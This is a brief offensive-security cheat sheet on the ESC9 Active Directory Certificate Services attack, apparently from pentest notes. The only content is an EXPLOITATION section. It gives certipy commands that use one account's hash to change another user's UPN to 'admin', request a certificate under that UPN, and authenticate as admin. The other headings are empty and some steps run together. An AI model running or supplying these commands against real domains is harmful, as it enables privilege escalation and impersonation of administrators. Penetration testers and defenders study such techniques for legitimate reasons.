ESC9
ABOUT
FLOW
EXPLOITATION
Temporarily set user2’s UPN to admin
certipy account update -username "user1@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -user user2 -upn adminRequest certificate as user2 (with UPN = admin)
certipy req -username "user2@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -target ca.militech.local -ca militech-DC01-CA -template CertifiedAuthenticationRevert user2’s UPN back to original
Authenticate with the certificate as admin
RESOURCES
Last updated